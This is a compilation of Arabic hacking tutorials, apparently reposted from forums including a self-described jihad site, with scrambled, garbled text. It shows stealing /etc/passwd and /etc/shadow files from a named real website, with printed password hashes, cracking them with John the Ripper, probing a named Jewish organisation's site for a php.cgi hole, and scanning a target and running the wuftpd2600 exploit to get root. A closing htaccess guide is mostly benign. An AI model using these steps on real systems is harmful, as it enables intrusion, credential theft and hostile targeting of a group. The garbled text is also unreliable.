شفرات ) يفسر برنامج تملك أن يجب ويندوز الدوسفي موجه) بيرل أكتيف مثل  البيرل

خطوات شكل على تكون قد اإلستثمارات من نادره انواع  .... وأحيرا

Exploit = إستثمار 

المرور - كلمة ملف  ؟ password file ماهو~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

توجد داخله في الذي هو ، إسمه من معروف المرور كلمة ملفهذا مثل ، السيرفر الى بالدخول المرخصلهم األشخاص  حسابات

------------------------------------------------------------------------------------------------ 

root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail

Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp

Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/:

www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu

sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh

jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh

landmark:x:1000:1000::/web/landmark:/bin/ksh ----------------------------------------------------------------------------------------------

-- أختصر باألعلى الموضح الملف هذا أن حيث ، بكثير أكثر تكون وقد

ليسكل ، السطور آالالف على يحتوي كان سحبه فعند ، كبير بشكليتجاوز ال من منها فيوجد الحجم بهذا المرور كلمات 10ملفات

تعرف عليك الحين أنت العموم على ، بكثره الموجوده وهي أسطراألشخاص حسابات توجد داخله في الذي هو المرور كلمة ملف بأن

السيرفر الى بالدخول  ...... المرخصلهم

؟ - الملف هذا يفيدني  بماذا~~~~~~~~~~~~~~~~~~~~~~~~~~ 

لكي المستخدمين وإسماء السر كلمات معرفه في الحبيب يا يفيدكتكون ...! المرور كلمة التفرح ولكن ، الموقع بإختراق تقوم

في ولكن زمان مشفره كانت ، تماما ليسصحيحا هذا ال ، مشفرهمضلله هي الحالي  الوقت

مضلله = x او* سر  Shadowed كلمة

EpGw4GekZ1B9U = مقياس على مشفره سر ، DES كلمة النوع هذاليونكسو في المستخدم التشفير األنظمه FreeBSD من من وعدد

من مكون دائما وهو ، ضعيف وسمول 13األخرى كبتل ورقم حرف يستخدم فهو ويندوز بإستثناء ، ابدا رمز على بينها من يحتوي وال

أيضا ضعيف نوع وهو التشفير من آخر  نوع

الباسورد - ملف خالل من السر كلمة معرفة يمكن password كيفfile ؟ 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~ من Ctrl + Shift إضغط لتقراء المفاتيح لوحه من األيمن القسم في

لملف مثال وضعت حيث االعلى الى إذهب ثم ، اليمين الى اليسارالموقع من سحبه تم مرور  ... hwwilson.com كلمة

السطر هذا  -: تفسيرroot:x:0:1:Super-User:/:/sbin/sh 

root الجذر هو واللي المستخدم يوضخ السطر root هذا

x العالمة مكانها يعني ، مضلله انها ويتضح ، المرور ، x وكلمة تفكر ال

تم ثاني ملف عن البحث عليك لكن ، مستحيل فهذا كسرها فيهذا تفعل كيف قليل بعد ستعرف ، المرور كلمة فيه  تخزين

0 المستخدم رقم هو  هذا

1 المجموعه  رقم

Super-User:/:/sbin/sh مشمهم  هذا

++++++++++++++++++++++++++++الثالث  الجزء

الملف - كان إذا بين كان )encryption مشفر( ماالفرق مضلل( وإذاshadowed( ؟ 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~~~~~~~~~ المضلل أو * shadow file الملف مثل رمز المرور كلمة مكان x يكون

لها # ! مثال وهذا أو  أوroot:x:0:1:Super-User:/:/sbin/sh 

مثل مشفره ولكن مكتوبه المرور كلمة تكون المشفر الملف لكن هذه

root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh هي المشفره المرور كلمة تكون  Q71KBZlvYSnVw هنا

صافيه الصوره طلعت  .... اآلن

؟ - كسره يتم كيف ، مشفر المرور كلمة ملف كان لو  وماذا~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~ هو وأشهرها كثيره آخر john the ripper و Crack 5.0a البرامج ويوجد، jack the ripper بإسم ليونكس في العمل يجيدون ممن كنت إذا

تنزيل عليك ، جيد ، Crack 5a فهذا يريد john the ripper وأفضل لمنفإن وللمعولميه ، ويندوز تحت john the ripper إستخدام أيضا عمل

 ..... ليونكس

البرامج هذه عمل  -: طريقهللبرنامج كما wordlist يقدم ، به الموجوده الكلمات بمطابقه ويقوم

هنا موضح  . هو

------------------------------------------------------------------------------------------------ \ Q2wrtUo9LPq2R >------ 

/ | /---/ | { مع | // >--- { المشفره المرور كلمة البدايه مقارنه أخذ / 1يتم الـ من حتى / _____________ |0الكلمات | / wordlist كلمة المختاره

/{ 0يتم / | | --------^--------- / 1تشفير{ / \----| word list | التطابق Q6LiJ6ct1oUBz >- المختاره /---/ الكلمة مشفره مرور | | كلمة

_____________| ------------------ //--------song------ \ تطابق حدث إذاأن يعني  فهذا

مشفره كانت التي المرور  كلمةكسرت  .. قد

مالحظه | ------------------------------------------------------------------------------- |كلمات :- لكسر األعلى في الموضحه مثل دوره عمل يتم مهمه

بسرعه المشفره  المرورالثانيه 5000 | {النهايه} في تجربه john the ripperإختبرنا( معالج على

700بسرعه ( | ------------------------------------------------------------------------------- 

------------------------------------------------------------------------------------------------ 

يسرقها أحد ال كذا عشان عليها تعبت الرسمه  هذه

التالي john the ripper لتشغيل األمر دوسنكتب واجه  من

john -w:wordlist passwd من wordlist حيث كبير عدد على يحتوي الذي القاموس ملف هو

 الكلماتالمشفره passwd و المرور كلمات على يحتوي الذي الملف هو

معرفتها نود  والتي

------------------------------------------------------------------------------------------------ 

Microsoft)R( Windows 98 C(Copyright Microsoft Corp 1981-1998.) 

E:\Desktop\junk\john the ripper<john -w asswd passwd.txt 

by Sola 97,John the Ripper Version 1.3 Copyright )c( 1996 

Loaded 1 password 

**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE 

<E:\Desktop\junk\john the ripper ----------------------------------------------------------------------------------------------

-- 

الملف في النتيجه تحفظ نفس john.pot وسوف في الموجودعمليه في البدء أردت إذا الملف هذا حذف وعليك ، الدايروكتري

من بدل آخر مكان في نقله أو إسمه تغيير ويمكنك جديده كسرذلك ترى كنت إذا  ... حذفه

بـ تسمى وهي للكسر اخرى طريقه بالعربي brute force هناك أولملف تحتاج ال وهي ، العنيفه ، wordlist القوه كل بتجربه تقوم هي

و خانتان بعضفي مع والرموز واألرقام واربع 3الحروف خانات ان .. افضل وأنا ، الصحيحه المرور كلمة تصيب حتى الخ وخمس

ملفات فقطألن wordlist تستخدم ثواني اال في معك يأخذ لن فذلكتجربه سرعة بأنه ذكرت باألعلى الرسم في الموضحه التجربه عمليه

يتجاوز ملفات 5000الكلمات تفلح لم إذا ، الثانيه في كلمة wordlist العنيفه القوه الى إذهب  brute force حينها

يجعل التالي طريقه john the ripper األمر brute force يستخدمذكرها  السابق

john -i passwd 

بتجربه passwd حيث قمت إذا ، كسره المراد المرور كلمة ملف هوتوصل أين الى لترى البرنامج عمل أثناء إنتر إضغط الطريقه ... هذه

22. ؟ - أعمل ان علي ماذا ، مضلل المرور كلمة ملف كان  ولو~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~ تسمى طريقه هناك لكن ، مضلله مرور كلمة تواجه سوف دائما

Unshadow المشكله هذه  !! لحلملف يسمى ثاني ملف عن البحث عليك ملفمضلل واجهت إذا

) الظل ) ملف  shadow file الشادويوضع مكان له تشغيل نظام وكل معينه امكنه في يوجد الملف وهذا

التالي الجدول اليك ، الملف هذا  : به

Linux : /etc/shadow token = * SunOS : /etc/shadow token = هو اشهرها متعدده أشكال  * يأخذ

FreeBSD : /etc/master.passwd or /etc/shadow token = * هو والجديدx 

IRIX : /etc/shadow token = x AIX : /etc/security/passwd token = ! 

ConvexOS : /etc/shadow or /etc/shadpw token = * 

token الملف في يوجد الذي الرمز ، passwd تعني في يفيد وهذافهذا ! المرور كلمه بدل عالمه لقيت مثال لو يعني ، المهمه تسهيل

في مسجله المرور كلمة ان ، etc/security/passwd/ يعني لقدملف ) أكرر ملفشادو على مثال ، ذكره السابق بالجدول إستعنت) الصحيحه المرور كلمة فيه تخزن الذي الملف هو  شادو

ملف  shadow هذا----------------------------------------------------------------------------------------------

-- root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445::::::

sys:NP:6445:::::: adm:IyEDQ6VoRlLHM:10935::::::

#admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445:::::: ----------------------------------------------------------------------------------------------

-- موجوده السر كلمات ان  نالحظ

الباسورد ملف دمج وهي األخيره shadow مع passwd file الخطوهpasswd الكسر برامج الى ونقدمه متكامل ملف على لنحصل

ذكرها  ...السابق

عليه حصلنا باسورد ملف هذا http://wilsonweb2.hwwilson.com/etc/passwd من

------------------------------------------------------------------------------------------------ 

root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail

Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp

Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/:

www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu

sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh

jerome:x:106:1::/home/jerome:/bin/sh

erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksh 

------------------------------------------------------------------------------------------------ 

الـ هو token ومن واللي السابق x الموضح الجدول خالل نعرفمنالدليل في الصحيحه المرور كلمة بأن  etc/shadow/ ذكره

الى بالمتصفح نتوجه  إذنhttp://wilsonweb2.hwwilson.com/etc/shadow 

الملف على  لنحصل----------------------------------------------------------------------------------------------

-- root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445::::::

bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445:::::: uucp:NP:6445::::::

nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445::::::

www:WJctaI.8rcSe2:10507:::::: mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515::::::

mirror:iMPWwbrU.gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976::::::

jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185:::::: 

------------------------------------------------------------------------------------------------ 

عالمه مكان ولصقها فيه الموجوده السر كلمات بنسخ في x نقوملمة ملف على لنحصل الحسابات جميع مع وهكذا ، الباسورد ملف

الكسر برامج الى ونقدمه ومتكامل كامل  مرور

مهمه  -: مالحظهبرامج عليها لتتعرف تربتها يعني ، سطر في حساب كل جعل عليك

 ... الكسر

الزياره تستحق  -: مواقع

لثغرات  أرشيفwww.securiteam.com/exploits/archive.html 

لثغرات  أرشيفhttp://www.ussrback.com/ 

الكثير + ثغرات  أرشيفhttp://www.secureroot.com/ 

ثغرات  أرشيف

http://www.rootshell.com/ 

ثغرات  أرشيفhttp://www.ussrback.com/ 

لثغرات  مواقعwww.secureroot.com/category/exploits 

الهاكينق لمواقع  دليلwww.hitboss.com/Hacking 

عنه غني ال بحث  محركhttp://www.undergroundnews.com/resou...und/search.asp 

Warez.com-Undergroundhttp://www.warez.com/ 

Hacking ( البدايه يريد لمن )ممتاز

http://www.neworder.box.sk/ 

Security Search Engine http://www.bugs2k.com/ 

insecure http://www.insecure.org/ 

>/XMP<>/BODY<>/HTML<

http://public.www.easynet.co.uk/cgi...ail/formmail.pl

،،،انتهى

" ) الثالث ) الجزء المواقع " اختراق

> اإللكتروني الجهاد موقع من >منقول

صنع ... من النه جدا جدا وبسيط جدا كبير االختراق عالم اخواني البشر

عن االختراق باب في وجديد المنتدى هذا في االعضاء احد كونيالثغرات  طريق

طلب .. فليسعيبا بعض من ونتعلم للجميع الفائده تحصل وحتى العلم

بل العلماء لنجابه ال نتعلم نحن بالعلم والتعالي الجهل العيب  انما

يعاديها من وجه ونقففي رايتها ونرفع امتنا  ..... لننفع

بس عنه قريت انا ما مثل جدا بسيط الثغرات موضوع الحقيقه  في

االخوان لعل بعضاالسئله ساطرح انا جهد وشوية متابعه يبي المشرفين

الموضوع في يساعدونا الكتاب  .... او

لي تبين قدامتها رغم الثغرات تكست من للعديد قرائتي خالل منامور  عدة

الموقع * تخترق تمتلك )host( لن حتى السيرفر مستضيفه الليطبيعي شيء وهذا والباسوور  اليوزر

الصالحيات * ملف تمتلك حتى السيرفر تخترق هو )passwd( لن الليالمستأجره للمواقع الحسابات  حق

مجلد تحت واقع الملف ان محيرني اللي بسسؤالي السيرفر عندتيسي اي  /etc/passwd اسمه

اسمه يكون اكساو shadow احيان او نجمه المرور كلمة ان ويعنياما تعجب فيه passwd عالمة  فتأتي

لها وتستخدم مشفره تشفيرها john the ripper الكلمه يفك الليللحين امل مالك الشادو ملفات  طبعا

؟؟؟ لها برنامج مافيه علمي حسب  على

ذا بسليشالملف امتداد له ملف كل ان نعرفه اللي هنا سؤال فيه؟ امتداد  ماله

يحفظ هل احفظه صيغه باي ؟؟ كانت طريقه باي الملف حصلت واذاام ( )pwd( كتكست ؟ ) صيغه اي  او

اليونكس مجلدات الملفمن فيه اللي المجلد ثاني سؤال فيه بعديناليونكس ان معروف كما النه  ؟

مجلدات ست  له

bin النظام تشغل اللي يعني الثنائيه بالملفات  خاصetc مدير حساب هو اللي الرووت ظمنها ومن النظام ادارة ملفات

او  passwd النظامdev االجهزه  ملفات

lib التشغيل في النظام تساعد اللي الديناميكي الربط  مكتباتtmp الثابته غير او الموقته  الملفات

usr بالنظام حسابت لهم اللي السر وكلمات المستخدمين  اسماء

نظام فيه السيرفر ان لو ذلك يعني ؟ nt هل منه الملف انزل اقدرباليونكس اللي نفسها المجلدات  وان

في موجوده اللي يختلف nt زي الملف واسم تختلف admin.pwd ام مثال

السابقه * للملفات للوصول الطرق تعني الثغرات لطريقة بالنسبهاخرى ملفات  او

للمجلد نسبة اي جي السي ثغرات اشهرها ملفات cgi-bin ومن اوامتداد  cgi من

؟؟؟ ليشسموها  ماعلينا

لنفترض شديده ببساطه والموقع الثغره مع نتعامل وشلون طيبثغره لدينا  ونريد php.cgiان

مستضاف مو يعني نيم دومين ذو موقع على تطبيقها /http://www.jewish.org مثال التالي  نفعل

http://www.jewish.org/  نكتب الثغره /cgi-bin ثم بحيث php.cgi ثمتجميعها بعد الخطوات  تصبح

http://www.jewish.org/cgi-bin/php.cgi  في كله هذا الكالمحقل في  المستعرضعندك

العنوان  االدرس

الموضوع على يعلق من لعل منها متأكد ماني حاجه اقول نسيت انايصححها صحيحه غير كانت  ان

اسمه ثاني بمجلد الثغره تكون ممكن الثغره scripts ان وتصبح السابقه

http://www.jewish.org/scripts/php.cgi 

scripts فيها  winnt خاصبسيرفرات

cgi-bin لينكس ايريساو يونيكساو  خاصبسيرفرات

جهة من التنفيذبه الملفات فيها توضع السابقه المجلدات للمعلوميهجافا االبلت مثل  السيرفر

في تطلع اللي مثل جهازك على تنفذ جافا السكربت ملفات اما.المستعرض

 ،،،انتهى

" ) متوسط ) المواقع اختراق " درسفي

>منقول<> ICER :الكاتب<

تجد : ... سوف جوجل في بحثت اذا اكاونت شيل المطلوبه االدواتالشيلز من الكثير

) تعيش ) يونيكسو لينكساو بتركب احمممم المحترمه الناس طبعاتريح و  حياتها

كويسلها... اكاونت اللينكسفالشيل ماتحبش تانيه ناس في نفسهايمشي ممكن  و

االتنين مشحاستعمل نفسي عن  انابالبرامج بيسمح انه يتاكدو الزم الشيل حيستعملو للي بالنسبه بس

زي االساسيهnslookup, host, dig, ping, traceroute,telnet, ssh, ftp

ال الزم اساسي ...) gcc و ركب عم يا كومبايل تعمل تعرف عشاننفسك ( ريح لينكسو

دي االدوات طبعا االكسبلويت nmap and netcat و هي حاجه اخر . و* الهامه الملحوظات : بعض

1- و االوامر في اختالف بالدوسمع جدا شبيه اكاونت الشيلمشحناقشكيفيه ..  الوظائف

عليه اتكلمت كثيره مواضيع فيه الن واحد على .الحصولال -2 متقدم nmap اداه سكانر بورت عن عباره هي

لسيرفير NetCat ال -3 بيانات برفع تقوم و بالتلنت شبيه اداه هيمعين

4- السي بلغه مكتوبه تكون غالبا برامج عن عباره هي االكسبلويتاتتقوم هي  و

كل بعمل تقوم و معين جهاز تخترق فهي الصالحيات كافه باعطائكتريده انت شيء

فين؟؟؟ تالقيها ممكن

... و مالقيتشقولي لو و دور يشيل من افه على السيكيوريتي مواقعموقع كام اديلك انا

دي الحاجات منه ....تجيب* بالموضوع المرتبطه : المواقع

a( Linux )http://www.slackware.com(b( Nmap )http://www.insecure.org(

c( NetCat )http://www.l0pht.com/~weld/netcat/(

-: الخطواتخشعالنت -1 الينكسو ( ركب من مفيشاحسن مشقلتلك

) P: اللينكساالداه -2 التالي nmap ركب : متبعا

*1( tar zxvf nmap.tar.gz2( cd nmap

3( ./configure && make && make install

3- ليكن و المستهدف الموقع .. شوفwww.target.com

باستخدام -4 الموقع تبع بي االي  شوف

nslookup www.target.com

ليكن و للموقع بي االي يعرضلك سوف 196.1.2.3هذانظام -5 شوف كمان و الموقع بيقدمها اللي الخدمات شوف

التالي متبعا -: التشغيل

"nmap -sS -O 196.1.2.3"

ده الكالم شبه مخرجات يديك انه -: المفروضroot@IcEr:~# nmap -sS -O 196.1.2.3

Starting nmap V. 2.54BETA22 ) www.insecure.org/nmap/ (Interesting ports on www.target.com )196.1.2.3(:

)The 1531 ports scanned but not shown below are in state: closed(

Port State Service21/tcp open ftp

25/tcp open smtp80/tcp open http

111/tcp open sunrpc113/tcp open auth

515/tcp open printer963/tcp open unknown

1024/tcp open kdm4444/tcp filtered krb524

6000/tcp open X116699/tcp filtered napster

OS guess for host: Linux 2.2.14-2.2.16Uptime 0.160 days )since Mon Apr 30 14:51:06 2001(

Nmap run completed -- 1 IP address )1 host up( scanned in 67 seconds

root@IcEr:~#

شباب يا كده  تمام...نكمل

البورتات يوريك للموقع استكشاف عن عباره كله ده الكالمفيه.. كان لو تشوف ممكن FTP daemon المفتوحه

ده و موجود حنالقيه فوق اللي المثال في ال ال و الموقع على شغالكويس

من فيرحين اي التالي FTP daemon شوف متبعا -: موجوده"telnet 196.1.2.3 21"

او"ftp 196.1.2.3"

اللي ديمون بي تي االف بتاعه الفيرجين فيه بانر حيديك منهم ايالسيرفير على شغاله

كده زي يكون : ممكن

root@IcEr:~# ftp 196.1.2.3Connected to 196.1.2.3.

220 www.target.com FTP server )Version wu-2.6.0)1( Mon Mar 6 13:54:16 SAST 2000(

ready.Name )target:root(: anonymous

331 Guest login ok, send your complete e-mail address as password.Password:

230-Welcome, archive user! This is an experimental FTP server. If have any

230-unusual problems, please report them via e-mail to root@IcEr.pandora.net

230-If you do have problems, please try using a dash )-( as the first character

230-of your password -- this will turn off the continuation messages that may

230-be confusing your ftp client.230-

230 Guest login ok, access restrictions apply.Remote system type is UNIX.

Using binary mode to transfer files.ftp<by

root@IcEr:~#

هي الموجوده الفيرجين ان تعرف تقدر ده الكالم .wu-2.6.0 مننخشكمجهولين حاولنا احنا ايضا اعمليه anonymous و كانت و

); ناجحهالمختار ####### الحبيب على ####### صلي

خطوه 8او 7 اهم انها المهم مشفاكر :-

من ديه الفيرجين بتاعه االكسبلويت على .FTPd احصل) سيرشميتوهش يعمل ) اللي

لتكن wuftpd2600.c وعشان متكوده انها حتالقي بتاعها السورسكود شفت لو المهم

ليكن و معين تشغيل red hat 6.2 نظامده التشغيل نظام على بيعمل المستهدف الموقع كان لو سالم يا  و

بشغلها و دي للثغره كومبايل تعمل انك تعمله اللي كل يبقى كدهسيرفر  على

حيديك كده و المستهدف root access الموقع;-(

root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3Target: 196.1.2.3 )ftp/>shellcode<(: RedHat 6.2 )?( with wuftpd

2.6.0)1( from rpmReturn Address: 0x08075844, AddrRetAddr: 0xbfffb028,

Shellcode: 152loggin into system..

USER ftp331 Guest login ok, send your complete e-mail address as

password.PASS >shellcode<

230-Next time please use your e-mail address as your password230- for example: icer@ae.net

230 Guest login ok, access restrictions apply.STEP 2 : Skipping, magic number already exists:

[87,01:03,02:01,01:02,04]STEP 3 : Checking if we can reach our return address by format

stringSTEP 4 : Ptr address test: 0xbfffb028 )if it is not 0xbfffb028 ^C me

now(STEP 5 : Sending code.. this will take about 10 seconds.

Press ^\ to leave shellLinux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000

i686 unknownuid=0)root( gid=0)root( egid=50)ftp( groups=50)ftp(

Bang! You have root!

ده .. االمر شوف الكومبايل امر نسيت انا  طبعاman gcc

الخيارات .. بكل الكومبايل امر عن كامله معلومات حيديلك هوه ومعاه اللي

عليه اللي عملت كده انا يبقى  كدهايه اعمل ايسر يا ياواد يقولي و كده بعد باه محدشيسالني

search..U will find what U wannaبعض ... .. .. كده بعد كات بالنت اعمل محدشسالني نسيت اه طيب

بتحتاجه ..الثغراتال خاصيه استغلينا اننا الحظت لو .. annonymous لو الكن الموجوده

الخاصيه كانتده .. الكالم نكمل مشحنعرف يبقى مشموجوده دي

االكسبلويتمش .. الحاله هذه في مشتشتغل االكسبلويت عشان

نيم يوزر و باسورد معانا لو اال تشتغلالموقع بتاع بي تي االف نخشعلى ..عشان

.. اكسبلويت كل و االكسبلويت بتاع السورس تقرا الزم كده عشانشغل ساينتكسو لها

.. احده و االساسيه المبادئ بس بيها .خاص

،،،انتهى

ملف " " htaccess شرح

>منقول<> BSD-r00t :الكاتب<

 | مقدمـــة * |ملف * | | htaccess. اهمية

ملف * | عمل | htaccess. كيفيةصفحات * | | خاصة error عمل

به * | يوجد ال الذي المجلد عرضمحتويات | index منعالشخاصمعينة/ * | الموقع دخول اتاحة  | منع

اخر * | للينك لينك فتح يحاول من | تحويلالملف * |  | .htpasswd عمل

| * بواسطه | htaccess. الحمايةالملف * | اظهار | htaccess. منع

الملف * | في مستخدمين | اضافةاخر * | بامتداد تظهر الصفحات | جعل--------------------------------------------------

 مقدمـــة *------------

سر , بكلمة فيه بعضاالجزاء اغالق و المواقع حماية وسائل اهم منالسماح و الموقع دخل الناسمن بعض منع و

الملف .. استخدام هو بالدخول عمل htaccess. لغيرهم يمكن الذي وبه الكثير و . الكثير

سر بكلمة محمي و الملفمخفي هذا  و

ملف * htaccess. اهمية-----------------------

سر -1 بكملة فيه جزء اي  حمايةصفحات -2 بك error عمل  خاصة

به -3 يوجد ال الذي المجلد عرضمحتويات index منعالشخاصمعينة/ -4 الموقع دخول اتاحة منع

غير -5 بأمتدادات البداية صفحة .. html , .asp. جعلاخر -6 للينك لينك فتح يحاول من  تحويل

ملف * عمل htaccess. كيفية---------------------------

باد النوت نصوصمثل محرر اي بواسطه الملف هذا عمل يمكنك

"Notepad" نحفظ و باسم للملفحفظ عمل طريق عناالسم بهذا ليسامتداده htacces. الملف يكون ان ان txt. على اي

ذلك , تستطيع لم اذا للملف اسم ليسهناكباسم الملف الملف - "htaccess." احفظ اسم التنصيصفي عالمتي

- .

صفحات * خاصة error عمل------------------------

محاولة عند انه كما افضل بشكل يظهر الموقع ان هو منها الفائدة وكان يظهر سوف الموقع على سكان ايشخصعمل

يقوم انه هي السكانر عمل طريقة الن ذلك و الثغرات كل به الموقعالنتيجه يرصد و الموقع على ثغره كل  بتطبيق

الثغره هذه عليه الموقع كأن لك يظهر تغير اي هناك كان . فاذاال صفحات عمل يمكنك طريق error و عن ك  -: الخاصه

ال- صفحات تصميم  اوال error أالموقع- على الصفحات تحميل  ب

الملف- في التابي السطر اضافه htaccess. جErrorDocument error_num directory_file 

يكون و " " error_num بخيث بالسفل موجود االرقام الخطا رقم هوdirectory_file ال صفحه مكان التي error هو

بتصميمها . قمتErrorDocument 404 /errors/nfound.html : مثال

ارقامها errors ال - : و

-----------------------| 400 | Bad Syntax |

-----------------------| 401 | Unauthorized | 

-----------------------| 402 | Not Used |-----------------------

| 403 | Forbidden |-----------------------

| 404 | Not Found |-----------------------

به * يوجد ال الذي المجلد عرضمحتويات index منع-----------------------------------------------

ملف به يكون ال و عليها دليل اي فتح محاولة عند المواقع بعضindex الدليل هذا محتويات جميع بسرد الموقع يقوم

طريقتين توجد المشكله هذه لحل -: وملف- وضع جدا " index أ صعب هذا بالطبع و المجلدات كل " فيالملف- باستخدام في htaccess. ب التالي السطر اضافه طريق عن

-: الملفOptions -Indexes 

الشخاصمعينة/ * الموقع دخول اتاحة منع

-------------------------------------الملف باستخدام دخول htaccess. يمكنك من شخصمعين منع

االتسفاده يمكنك و به الخاصه بي االي معرفة بعد  الموقعمنع يمكنك كما تريد ال لمن الموقع دخل منع يمكنك حيث ذلك من

مثال اسرائيل اليشخصفي الموقع .. دخولالملف في التالي السطر اضافة طريق عن ذلك يمكنك - : و

???.???.???.??? deny from  . . . به الخاص بي االي هو ؟؟؟ ؟؟؟ ؟؟؟ ؟؟؟ ان . حيث

السطر اضافة يمكنك الموقع دخول من احد اي منع اردت واذا -: التالي

deny from allباضافة ذلك يمكنك الموقع بدخول لشخصمعين السماح اردت واذا

التالي -: السطر. . ؟؟؟. ؟؟؟ ؟؟؟  allow from ؟؟؟

. . . به الخاص بي االي هو ؟؟؟ ؟؟؟ ؟؟؟ ؟؟؟ انا  حيث

اخر * للينك لينك فتح يحاول من  تحويل-------------------------------------

ب العمليه هذه فوائد Redirection وتسمى اهم من htaccess. وهيقديم ملف موقع تغير عند مثال تستخدم الملف

الملف باستخدام فيمكنك جديد مكان الى الموقع htaccess. علىتوجيه القديم الينك احد فتح احد محاولة عند

الملف في التالي السطر اضافة طريق عن الجديد الينك -: الى???.???/Redirect

/somewhere/???.??? http://www.site.com/newlocation يكون القديم ???.???/somewhere/ بحيث الملف مكان هو

 ???.???/http://www.site.com/newlocation و مكان هوالجديد .الملف

----------

الملف * .htpasswd عمل------------------------

الملف بنفسطريقة بعمله تقوم نعمله , htaccess. ويمكنك سوف والملف استخدام نسطيع htaccess. تى

الملف في نكتب سوف و الحماية يأتي htpasswd في  -: ماuser1:EncryptedPwd1user2:EncryptedPwd2

o ان المستخدم user1 , user2 حيث اسم . هوo و EncryptedPwd1 , EncryptedPwd2 ولكن السر كلمات هي

تريدها كلمة اي تشفير يمكنك و  مشفرهالموقع طريق  عن

http://www.euronet.nl/~arnow/htpasswdاو

http://www.e2.u-net.com/htaccess/make.htmباسم يوسر وضع اردنا لو به Security فمثال الخاصة السر كلمة و

الموقع fu93hds3 هي الى اوال  نذهبhttp://www.euronet.nl/~arnow/htpasswd 

o و username : Security o و passwrod & re-enter password : fu93hds3 

o الزر على نضغط النتيجه claculate و >-- لتظهرSecurity:893bNicBcwszw 

الملف عمل اتممنا قد االن ذلك htaccess. و و بعمله قمنا الذي والملف استخدام نستطيع htaccess. لكي

يوسر و سر بكلمة . للحمايةبواسطه * htaccess. الحماية

----------------------------من احد اي منع يمكن انه حيث للملف الرئيسية الفائدة تعتبر و

معه كان اذا اال الموقع في معين دليل دخولخاص , منتدى عمل طريقها عن فيمنكنك نيم اليوسر و السر كلمة

تريد شئ اي .اوالملف وضع هذا htaccess. فعند دخول احد حاول و دليل اي في

منه يطلب سوف تحته يندرج جزء اي او  الدليليوسر و سر . كلمة

نسخه قبل الملف في يأتي ما اضافة طريق عن ذلك عمل يمكنك وحمايته المراد الدليل --: في

AuthUserFile /somewhere/.htpasswd"AuthName "Enter your user and passed please 

Require valid-userAuthType Basic

>Limit GET POST<require valid-user

>/Limit<o يكون ملف /somewhere/.htpasswd بحيث مكان htpasswd. هو

موقعك  علىo يكون التي Enter your user and passed please و الرساله هي

السر كلمة لتطلب تظهر  سوف

الملف * اظهار htaccess. منع-----------------------------

نحميه ان علينا فيجب كبيره اهميه الملف لهذا ان االن عرفنا قداال , الملفمخفي ان من فالبرغم جيدا

هناك انه او مؤمن غير نفسه السرفر يكون ان من سالم غير انهخطأ  .. تصريح

يأتي ما اضافة طريق الملفعن عرضهذا نمنع سوف  - : لذلك

>Files .htaccess<order allow,deny 

deny from all>/Files<

له يظهر الملفسوف عرض احد حاول . error 403 فاذا

اخر * بامتداد تظهر الصفحات  جعل-------------------------------

امتداده كأن يظهر ملف عمل الخاصية هذه باستخدام و html. ويمكنامتداد ذو . مثال txt. لكنهالتالي السطر -: باضاف

AddType text/plain htmlالملف هذا في عملها يمكنك التي التغيرات كافى رؤية  -: ويمكنك

http://www.pharaonics.net/books/MIME.txt

،،،انتهى

الملفات " نقل " FTP نظام

> إعصار منتدى من >منقول> الجوكر: >الكاتب

الملفات نقل هو  ؟ FTP ما

FTP لكلمة اختصار نقل File Transfer Protocol هي بروتوكول وتعنيتسهيالت احدى هي الخدمة وهذه من TCP/IP الملفات، تجعل التي

